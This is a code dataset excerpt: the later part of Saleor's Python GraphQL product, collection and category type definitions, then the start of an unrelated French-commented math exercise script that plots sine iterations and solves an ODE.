permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n media_by_id = graphene.Field(\n lambda: ProductMedia,\n id=graphene.Argument(graphene.ID, description=\"ID of a product media.\"),\n description=\"Get a single product media by ID.\",\n )\n image_by_id = graphene.Field(\n lambda: ProductImage,\n id=graphene.Argument(graphene.ID, description=\"ID of a product image.\"),\n description=\"Get a single product image by ID.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `mediaById` field instead.\"\n ),\n )\n variants = NonNullList(\n ProductVariant,\n description=(\n \"List of variants for the product. Requires the following permissions to \"\n \"include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n media = NonNullList(\n lambda: ProductMedia,\n description=\"List of media for the product.\",\n )\n images = NonNullList(\n lambda: ProductImage,\n description=\"List of images for the product.\",\n deprecation_reason=f\"{DEPRECATED_IN_3X_FIELD} Use the `media` field instead.\",\n )\n collections = NonNullList(\n lambda: Collection,\n description=(\n \"List of collections for the product. Requires the following permissions \"\n \"to include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n translation = TranslationField(\n ProductTranslation,\n type_name=\"product\",\n resolver=ChannelContextType.resolve_translation,\n )\n available_for_purchase = graphene.Date(\n description=\"Date when product is available for purchase.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} \"\n \"Use the `availableForPurchaseAt` field to fetch \"\n \"the available for purchase date.\"\n ),\n )\n available_for_purchase_at = graphene.DateTime(\n description=\"Date when product is available for purchase.\"\n )\n is_available_for_purchase = graphene.Boolean(\n description=\"Whether the product is available for purchase.\"\n )\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = \"Represents an individual item for sale in the storefront.\"\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Product\n\n @staticmethod\n def resolve_created(root: ChannelContext[models.Product], _info):\n created_at = root.node.created_at\n return created_at\n\n @staticmethod\n def resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_default_variant(root: ChannelContext[models.Product], info):\n default_variant_id = root.node.default_variant_id\n if default_variant_id is None:\n return None\n\n def return_default_variant_with_channel_context(variant):\n return ChannelContext(node=variant, channel_slug=root.channel_slug)\n\n return (\n ProductVariantByIdLoader(info.context)\n .load(default_variant_id)\n .then(return_default_variant_with_channel_context)\n )\n\n @staticmethod\n def resolve_category(root: ChannelContext[models.Product], info):\n category_id = root.node.category_id\n if category_id is None:\n return None\n return CategoryByIdLoader(info.context).load(category_id)\n\n @staticmethod\n def resolve_description_json(root: ChannelContext[models.Product], _info):\n description = root.node.description\n return description if description is not None else {}\n\n @staticmethod\n def resolve_tax_type(root: ChannelContext[models.Product], info):\n manager = load_plugin_manager(info.context)\n tax_data = manager.get_tax_code_from_object_meta(root.node)\n return TaxType(tax_code=tax_data.code, description=tax_data.description)\n\n @staticmethod\n @traced_resolver\n def resolve_thumbnail(\n root: ChannelContext[models.Product], info, *, size=256, format=None\n ):\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def return_first_thumbnail(product_media):\n if not product_media:\n return None\n\n image = product_media[0]\n oembed_data = image.oembed_data\n\n if oembed_data.get(\"thumbnail_url\"):\n return Image(alt=oembed_data[\"title\"], url=oembed_data[\"thumbnail_url\"])\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, image.id, \"ProductMedia\", size, format\n )\n return Image(alt=image.alt, url=build_absolute_uri(url))\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((image.id, size, format))\n .then(_resolve_url)\n )\n\n return (\n MediaByProductIdLoader(info.context)\n .load(root.node.id)\n .then(return_first_thumbnail)\n )\n\n @staticmethod\n def resolve_url(_root, _info):\n return \"\"\n\n @staticmethod\n def resolve_pricing(root: ChannelContext[models.Product], info, *, address=None):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n context = info.context\n\n product_channel_listing = ProductChannelListingByProductIdAndChannelSlugLoader(\n context\n ).load((root.node.id, channel_slug))\n variants = ProductVariantsByProductIdLoader(context).load(root.node.id)\n variants_channel_listing = (\n VariantsChannelListingByProductIdAndChannelSlugLoader(context).load(\n (root.node.id, channel_slug)\n )\n )\n collections = CollectionsByProductIdLoader(context).load(root.node.id)\n channel = ChannelBySlugLoader(context).load(channel_slug)\n\n address_country = address.country if address is not None else None\n manager = load_plugin_manager(info.context)\n\n def calculate_pricing_info(discounts):\n def calculate_pricing_with_channel(channel):\n def calculate_pricing_with_product_channel_listings(\n product_channel_listing,\n ):\n def calculate_pricing_with_variants(variants):\n def calculate_pricing_with_variants_channel_listings(\n variants_channel_listing,\n ):\n def calculate_pricing_with_collections(collections):\n if not variants_channel_listing:\n return None\n\n local_currency = None\n country_code = (\n address_country or channel.default_country.code\n )\n local_currency = get_currency_for_country(country_code)\n\n availability = get_product_availability(\n product=root.node,\n product_channel_listing=product_channel_listing,\n variants=variants,\n variants_channel_listing=variants_channel_listing,\n collections=collections,\n discounts=discounts,\n channel=channel,\n manager=manager,\n country=Country(country_code),\n local_currency=local_currency,\n )\n return ProductPricingInfo(**asdict(availability))\n\n return collections.then(calculate_pricing_with_collections)\n\n return variants_channel_listing.then(\n calculate_pricing_with_variants_channel_listings\n )\n\n return variants.then(calculate_pricing_with_variants)\n\n return product_channel_listing.then(\n calculate_pricing_with_product_channel_listings\n )\n\n return channel.then(calculate_pricing_with_channel)\n\n return (\n DiscountsByDateTimeLoader(context)\n .load(info.context.request_time)\n .then(calculate_pricing_info)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_is_available(\n root: ChannelContext[models.Product], info, *, address=None\n ):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n country_code = address.country if address is not None else None\n\n requestor = get_user_or_app_from_context(info.context)\n\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n def calculate_is_available(quantities):\n for qty in quantities:\n if qty > 0:\n return True\n return False\n\n def load_variants_availability(variants):\n keys = [(variant.id, country_code, channel_slug) for variant in variants]\n return AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader(\n info.context\n ).load_many(keys)\n\n def check_variant_availability():\n if has_required_permissions and not channel_slug:\n variants = ProductVariantsByProductIdLoader(info.context).load(\n root.node.id\n )\n elif has_required_permissions and channel_slug:\n variants = ProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, channel_slug)\n )\n else:\n variants = AvailableProductVariantsByProductIdAndChannel(\n info.context\n ).load((root.node.id, channel_slug))\n return variants.then(load_variants_availability).then(\n calculate_is_available\n )\n\n def check_is_available_for_purchase(product_channel_listing):\n if product_channel_listing:\n if product_channel_listing.is_available_for_purchase():\n return check_variant_availability()\n return False\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(check_is_available_for_purchase)\n )\n\n @staticmethod\n def resolve_attributes(root: ChannelContext[models.Product], info):\n return SelectedAttributesByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_media_by_id(root: ChannelContext[models.Product], _info, *, id):\n _type, pk = from_global_id_or_error(id, ProductMedia)\n return root.node.media.filter(pk=pk).first()\n\n @staticmethod\n def resolve_image_by_id(root: ChannelContext[models.Product], _info, *, id):\n _type, pk = from_global_id_or_error(id, ProductImage)\n return root.node.media.filter(pk=pk).first()\n\n @staticmethod\n def resolve_media(root: ChannelContext[models.Product], info):\n return MediaByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_images(root: ChannelContext[models.Product], info):\n return ImagesByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_variants(root: ChannelContext[models.Product], info):\n requestor = get_user_or_app_from_context(info.context)\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n if has_required_permissions and not root.channel_slug:\n variants = ProductVariantsByProductIdLoader(info.context).load(root.node.id)\n elif has_required_permissions and root.channel_slug:\n variants = ProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, root.channel_slug)\n )\n else:\n variants = AvailableProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, root.channel_slug)\n )\n\n def map_channel_context(variants):\n return [\n ChannelContext(node=variant, channel_slug=root.channel_slug)\n for variant in variants\n ]\n\n return variants.then(map_channel_context)\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.Product], info):\n return ProductChannelListingByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n @traced_resolver\n def resolve_collections(root: ChannelContext[models.Product], info):\n requestor = get_user_or_app_from_context(info.context)\n\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n def return_collections(collections):\n if has_required_permissions:\n return [\n ChannelContext(node=collection, channel_slug=root.channel_slug)\n for collection in collections\n ]\n\n dataloader_keys = [\n (collection.id, str(root.channel_slug)) for collection in collections\n ]\n CollectionChannelListingLoader = (\n CollectionChannelListingByCollectionIdAndChannelSlugLoader\n )\n channel_listings = CollectionChannelListingLoader(info.context).load_many(\n dataloader_keys\n )\n\n def return_visible_collections(channel_listings):\n visible_collections = []\n channel_listings_dict = {\n channel_listing.collection_id: channel_listing\n for channel_listing in channel_listings\n if channel_listing\n }\n\n for collection in collections:\n channel_listing = channel_listings_dict.get(collection.id)\n if channel_listing and channel_listing.is_visible:\n visible_collections.append(collection)\n\n return [\n ChannelContext(node=collection, channel_slug=root.channel_slug)\n for collection in visible_collections\n ]\n\n return channel_listings.then(return_visible_collections)\n\n return (\n CollectionsByProductIdLoader(info.context)\n .load(root.node.id)\n .then(return_collections)\n )\n\n @staticmethod\n def resolve_weight(root: ChannelContext[models.Product], _info):\n return convert_weight_to_default_weight_unit(root.node.weight)\n\n @staticmethod\n @traced_resolver\n def resolve_is_available_for_purchase(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_is_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.is_available_for_purchase()\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(calculate_is_available_for_purchase)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_available_for_purchase(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.available_for_purchase_at\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(calculate_available_for_purchase)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_available_for_purchase_at(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.available_for_purchase_at\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(calculate_available_for_purchase)\n )\n\n @staticmethod\n def resolve_product_type(root: ChannelContext[models.Product], info):\n return ProductTypeByIdLoader(info.context).load(root.node.product_type_id)\n\n @staticmethod\n def __resolve_references(roots: List[\"Product\"], info):\n requestor = get_user_or_app_from_context(info.context)\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n _, root_id = from_global_id_or_error(root.id, Product, raise_error=True)\n if root_id:\n roots_ids.append(f\"{root.channel}_{root_id}\")\n channels[root.channel].add(root_id)\n\n products = {}\n for channel, ids in channels.items():\n queryset = resolve_products(\n info, requestor, channel_slug=channel\n ).qs.filter(id__in=ids)\n\n for product in queryset:\n products[f\"{channel}_{product.id}\"] = ChannelContext(\n channel_slug=channel, node=product\n )\n\n return [products.get(root_id) for root_id in roots_ids]\n\n\nclass ProductCountableConnection(CountableConnection):\n class Meta:\n node = Product\n\n\n@federated_entity(\"id\")\nclass ProductType(ModelObjectType):\n id = graphene.GlobalID(required=True)\n name = graphene.String(required=True)\n slug = graphene.String(required=True)\n has_variants = graphene.Boolean(required=True)\n is_shipping_required = graphene.Boolean(required=True)\n is_digital = graphene.Boolean(required=True)\n weight = graphene.Field(Weight)\n kind = ProductTypeKindEnum(description=\"The product type kind.\", required=True)\n products = ConnectionField(\n ProductCountableConnection,\n channel=graphene.String(\n description=\"Slug of a channel for which the data should be returned.\"\n ),\n description=\"List of products of this type.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} \"\n \"Use the top-level `products` query with the `productTypes` filter.\"\n ),\n )\n tax_type = graphene.Field(\n TaxType, description=\"A type of tax. Assigned by enabled tax gateway\"\n )\n variant_attributes = NonNullList(\n Attribute,\n description=\"Variant attributes of that product type.\",\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use `assignedVariantAttributes` instead.\"\n ),\n )\n assigned_variant_attributes = NonNullList(\n AssignedVariantAttribute,\n description=(\n \"Variant attributes of that product type with attached variant selection.\"\n + ADDED_IN_31\n ),\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n )\n product_attributes = NonNullList(\n Attribute, description=\"Product attributes of that product type.\"\n )\n available_attributes = FilterConnectionField(\n AttributeCountableConnection,\n filter=AttributeFilterInput(),\n description=\"List of attributes which can be assigned to this product type.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n\n class Meta:\n description = (\n \"Represents a type of product. It defines what attributes are available to \"\n \"products of this type.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.ProductType\n\n @staticmethod\n def resolve_tax_type(root: models.ProductType, info):\n manager = load_plugin_manager(info.context)\n tax_data = manager.get_tax_code_from_object_meta(root)\n return TaxType(tax_code=tax_data.code, description=tax_data.description)\n\n @staticmethod\n def resolve_product_attributes(root: models.ProductType, info):\n def unpack_attributes(attributes):\n return [attr for attr, *_ in attributes]\n\n return (\n ProductAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(unpack_attributes)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_variant_attributes(\n root: models.ProductType,\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return [attr for attr, *_ in attributes]\n variant_selection_attrs = get_variant_selection_attributes(attributes)\n if variant_selection == VariantAttributeScope.VARIANT_SELECTION:\n return [attr for attr, *_ in variant_selection_attrs]\n return [\n attr\n for attr, variant_selection in attributes\n if (attr, variant_selection) not in variant_selection_attrs\n ]\n\n return (\n VariantAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_assigned_variant_attributes(\n root: models.ProductType,\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in attributes\n ]\n variant_selection_attrs = get_variant_selection_attributes(attributes)\n if variant_selection == VariantAttributeScope.VARIANT_SELECTION:\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in variant_selection_attrs\n ]\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in attributes\n if (attr, variant_selection) not in variant_selection_attrs\n ]\n\n return (\n VariantAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n def resolve_products(root: models.ProductType, info, *, channel=None, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n if channel is None:\n channel = get_default_channel_slug_or_graphql_error()\n qs = root.products.visible_to_user(requestor, channel) # type: ignore\n qs = ChannelQsContext(qs=qs, channel_slug=channel)\n kwargs[\"channel\"] = channel\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def resolve_available_attributes(root: models.ProductType, info, **kwargs):\n qs = attribute_models.Attribute.objects.get_unassigned_product_type_attributes(\n root.pk\n )\n qs = resolve_attributes(info, qs=qs)\n qs = filter_connection_queryset(qs, kwargs, info.context)\n return create_connection_slice(qs, info, kwargs, AttributeCountableConnection)\n\n @staticmethod\n def resolve_weight(root: models.ProductType, _info):\n return convert_weight_to_default_weight_unit(root.weight)\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductType\"], _info):\n return resolve_federation_references(\n ProductType, roots, models.ProductType.objects\n )\n\n\nclass ProductTypeCountableConnection(CountableConnection):\n class Meta:\n node = ProductType\n\n\n@federated_entity(\"id channel\")\nclass Collection(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = graphene.String()\n seo_description = graphene.String()\n name = graphene.String(required=True)\n description = JSONString(\n description=\"Description of the collection.\" + RICH_CONTENT\n )\n slug = graphene.String(required=True)\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this collection. Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n description_json = JSONString(\n description=\"Description of the collection.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n products = FilterConnectionField(\n ProductCountableConnection,\n filter=ProductFilterInput(description=\"Filtering options for products.\"),\n sort_by=ProductOrder(description=\"Sort products.\"),\n description=\"List of products in this collection.\",\n )\n background_image = ThumbnailField()\n translation = TranslationField(\n CollectionTranslation,\n type_name=\"collection\",\n resolver=ChannelContextType.resolve_translation,\n )\n channel_listings = PermissionsField(\n NonNullList(CollectionChannelListing),\n description=\"List of channels in which the collection is available.\",\n permissions=[\n ProductPermissions.MANAGE_PRODUCTS,\n ],\n )\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = \"Represents a collection of products.\"\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Collection\n\n @staticmethod\n def resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_background_image(\n root: ChannelContext[models.Collection], info, size=None, format=None\n ):\n node = root.node\n if not node.background_image:\n return\n\n alt = node.background_image_alt\n if not size:\n return Image(url=node.background_image.url, alt=alt)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_background_image(thumbnail):\n url = get_image_or_proxy_url(thumbnail, node.id, \"Collection\", size, format)\n return Image(url=url, alt=alt)\n\n return (\n ThumbnailByCollectionIdSizeAndFormatLoader(info.context)\n .load((node.id, size, format))\n .then(_resolve_background_image)\n )\n\n @staticmethod\n def resolve_products(root: ChannelContext[models.Collection], info, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n qs = root.node.products.visible_to_user( # type: ignore\n requestor, root.channel_slug\n )\n qs = ChannelQsContext(qs=qs, channel_slug=root.channel_slug)\n\n kwargs[\"channel\"] = root.channel_slug\n qs = filter_connection_queryset(qs, kwargs)\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.Collection], info):\n return CollectionChannelListingByCollectionIdLoader(info.context).load(\n root.node.id\n )\n\n @staticmethod\n def resolve_description_json(root: ChannelContext[models.Collection], _info):\n description = root.node.description\n return description if description is not None else {}\n\n @staticmethod\n def __resolve_references(roots: List[\"Collection\"], info):\n from ..resolvers import resolve_collections\n\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n _, root_id = from_global_id_or_error(root.id, Collection, raise_error=True)\n roots_ids.append(f\"{root.channel}_{root_id}\")\n channels[root.channel].add(root_id)\n\n collections = {}\n for channel, ids in channels.items():\n queryset = resolve_collections(info, channel).qs.filter(id__in=ids)\n\n for collection in queryset:\n collections[f\"{channel}_{collection.id}\"] = ChannelContext(\n channel_slug=channel, node=collection\n )\n\n return [collections.get(root_id) for root_id in roots_ids]\n\n\nclass CollectionCountableConnection(CountableConnection):\n class Meta:\n node = Collection\n\n\n@federated_entity(\"id\")\nclass Category(ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = graphene.String()\n seo_description = graphene.String()\n name = graphene.String(required=True)\n description = JSONString(description=\"Description of the category.\" + RICH_CONTENT)\n slug = graphene.String(required=True)\n parent = graphene.Field(lambda: Category)\n level = graphene.Int(required=True)\n description_json = JSONString(\n description=\"Description of the category.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n ancestors = ConnectionField(\n lambda: CategoryCountableConnection,\n description=\"List of ancestors of the category.\",\n )\n products = ConnectionField(\n ProductCountableConnection,\n channel=graphene.String(\n description=\"Slug of a channel for which the data should be returned.\"\n ),\n description=(\n \"List of products in the category. Requires the following permissions to \"\n \"include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n children = ConnectionField(\n lambda: CategoryCountableConnection,\n description=\"List of children of the category.\",\n )\n background_image = ThumbnailField()\n translation = TranslationField(CategoryTranslation, type_name=\"category\")\n\n class Meta:\n description = (\n \"Represents a single category of products. Categories allow to organize \"\n \"products in a tree-hierarchies which can be used for navigation in the \"\n \"storefront.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Category\n\n @staticmethod\n def resolve_ancestors(root: models.Category, info, **kwargs):\n return create_connection_slice(\n root.get_ancestors(), info, kwargs, CategoryCountableConnection\n )\n\n @staticmethod\n def resolve_description_json(root: models.Category, _info):\n description = root.description\n return description if description is not None else {}\n\n @staticmethod\n def resolve_background_image(root: models.Category, info, size=None, format=None):\n if not root.background_image:\n return\n\n alt = root.background_image_alt\n if not size:\n return Image(url=root.background_image.url, alt=alt)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_background_image(thumbnail):\n url = get_image_or_proxy_url(thumbnail, root.id, \"Category\", size, format)\n return Image(url=url, alt=alt)\n\n return (\n ThumbnailByCategoryIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_background_image)\n )\n\n @staticmethod\n def resolve_children(root: models.Category, info, **kwargs):\n def slice_children_categories(children):\n return create_connection_slice(\n children, info, kwargs, CategoryCountableConnection\n )\n\n return (\n CategoryChildrenByCategoryIdLoader(info.context)\n .load(root.pk)\n .then(slice_children_categories)\n )\n\n @staticmethod\n def resolve_url(root: models.Category, _info):\n return \"\"\n\n @staticmethod\n @traced_resolver\n def resolve_products(root: models.Category, info, *, channel=None, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n tree = root.get_descendants(include_self=True)\n if channel is None and not has_required_permissions:\n channel = get_default_channel_slug_or_graphql_error()\n qs = models.Product.objects.all()\n if not has_required_permissions:\n qs = (\n qs.visible_to_user(requestor, channel)\n .annotate_visible_in_listings(channel)\n .exclude(\n visible_in_listings=False,\n )\n )\n if channel and has_required_permissions:\n qs = qs.filter(channel_listings__channel__slug=channel)\n qs = qs.filter(category__in=tree)\n qs = ChannelQsContext(qs=qs, channel_slug=channel)\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def __resolve_references(roots: List[\"Category\"], _info):\n return resolve_federation_references(Category, roots, models.Category.objects)\n\n\nclass CategoryCountableConnection(CountableConnection):\n class Meta:\n node = Category\n\n\n@federated_entity(\"id\")\nclass ProductMedia(ModelObjectType):\n id = graphene.GlobalID(required=True)\n sort_order = graphene.Int()\n alt = graphene.String(required=True)\n type = ProductMediaType(required=True)\n oembed_data = JSONString(required=True)\n url = ThumbnailField(graphene.String, required=True)\n\n class Meta:\n description = \"Represents a product media.\"\n interfaces = [relay.Node]\n model = models.ProductMedia\n\n @staticmethod\n def resolve_url(root: models.ProductMedia, info, *, size=None, format=None):\n if root.external_url:\n return root.external_url\n\n if not root.image:\n return\n\n if not size:\n return build_absolute_uri(root.image.url)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, root.id, \"ProductMedia\", size, format\n )\n return build_absolute_uri(url)\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_url)\n )\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductMedia\"], _info):\n return resolve_federation_references(\n ProductMedia, roots, models.ProductMedia.objects\n )\n\n\nclass ProductImage(graphene.ObjectType):\n id = graphene.ID(required=True, description=\"The ID of the image.\")\n alt = graphene.String(description=\"The alt text of the image.\")\n sort_order = graphene.Int(\n required=False,\n description=(\n \"The new relative sorting position of the item (from -inf to +inf). \"\n \"1 moves the item one position forward, -1 moves the item one position \"\n \"backward, 0 leaves the item unchanged.\"\n ),\n )\n url = ThumbnailField(graphene.String, required=True)\n\n class Meta:\n description = \"Represents a product image.\"\n\n @staticmethod\n def resolve_id(root: models.ProductMedia, info):\n return graphene.Node.to_global_id(\"ProductImage\", root.id)\n\n @staticmethod\n def resolve_url(root: models.ProductMedia, info, *, size=None, format=None):\n if not root.image:\n return\n\n if not size:\n return build_absolute_uri(root.image.url)\n\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, root.id, \"ProductMedia\", size, format\n )\n return build_absolute_uri(url)\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((root.id, size, format))\n .then(_resolve_url)\n )\n","sub_path":"saleor/graphql/product/types/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":68049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367880054","text":"import numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\ndef iteres_1(n):\r\n res = np.arange(n+1) + 1\r\n while n>0:\r\n res = np.sin(res)\r\n n -= 1\r\n return res\r\n\r\ndef iteres_2(n):\r\n res = (n+1) * [1.]\r\n for i in range(n):\r\n res[i+1] = np.sin(res[i])\r\n return res\r\n\r\ndef x(n):\r\n res = 1\r\n while n>0:\r\n res = np.sin(res)\r\n n -= 1\r\n return res\r\n\r\ndef iteres_3(n):\r\n res = list(range(n+1))\r\n for i in res:\r\n res[i] = x(i)\r\n return res\r\n\r\ndef calcu():\r\n n = 100000\r\n print(iteres_2(n)[-1] / math.sqrt(3/n))\r\n\r\n\r\ndef _dessin(u,n,f):\r\n \"\"\"\r\n u : point de depart\r\n n : nbr iteration\r\n f : fonction\r\n \"\"\"\r\n v = u\r\n X = [u]\r\n Y = [0]\r\n for k in range(n):\r\n w = f(v)\r\n X.append(v)\r\n Y.append(w)\r\n X.append(w)\r\n Y.append(w)\r\n\r\n v = w\r\n\r\n #X.append(v)\r\n #Y.append(0)\r\n\r\n plt.plot(X,Y)\r\n plt.plot([0,1],[0,1],\"r\")\r\n\r\n Xsin = [i/1000 for i in range(1000)]\r\n Ysin = []\r\n for x in Xsin:\r\n Ysin.append(math.sin(x))\r\n\r\n plt.plot(Xsin,Ysin,\"g\")\r\n plt.show()\r\n \r\ndef dessin():\r\n def f(x):\r\n return math.sin(x)\r\n u = 1\r\n n = 100\r\n _dessin(u,n,f)\r\n\r\ndef Sn():\r\n n = 1000\r\n X = [i for i in range(n)]\r\n Y = [1]\r\n for k in range(1,n):\r\n l = (-1)**k * x(k)\r\n Y.append(Y[-1] + l)\r\n\r\n\r\n plt.plot(X,Y)\r\n plt.show()\r\n\r\n\r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\r\ndef formatage(L):\r\n M = []\r\n if len(L) == 1:\r\n return M\r\n \r\n for k in range(len(L)-1):\r\n u = L[k+1] - L[k]\r\n if u == 0:\r\n M.append(0)\r\n while u > 0:\r\n M.append(1)\r\n u -= 1\r\n while u < 0:\r\n M.append(-1)\r\n u += 1\r\n return M\r\n\r\n \r\n\r\ndef trace_ascenseur(L):\r\n #L = L = [1,0,2,-1,-1,1,2]\r\n M = formatage(L)\r\n X = [i for i in range(len(M)+1)]\r\n Y = [L[0]]\r\n niveau = L[0]\r\n for x in M:\r\n niveau += x\r\n Y.append(niveau)\r\n plt.plot(X,Y)\r\n plt.grid()\r\n plt.show()\r\n \r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n\r\nimport scipy.integrate as integr\r\n\r\n\r\ndef Cauchy():\r\n # x' = -x + cos(10t) , x(0)=3 sur [0,2]\r\n\r\n def f(x,t):\r\n return -x + math.cos(10*t)\r\n\r\n X = np.arange(0,2,0.001)\r\n Y = integr.odeint(f,3,X)\r\n plt.plot(X,Y)\r\n 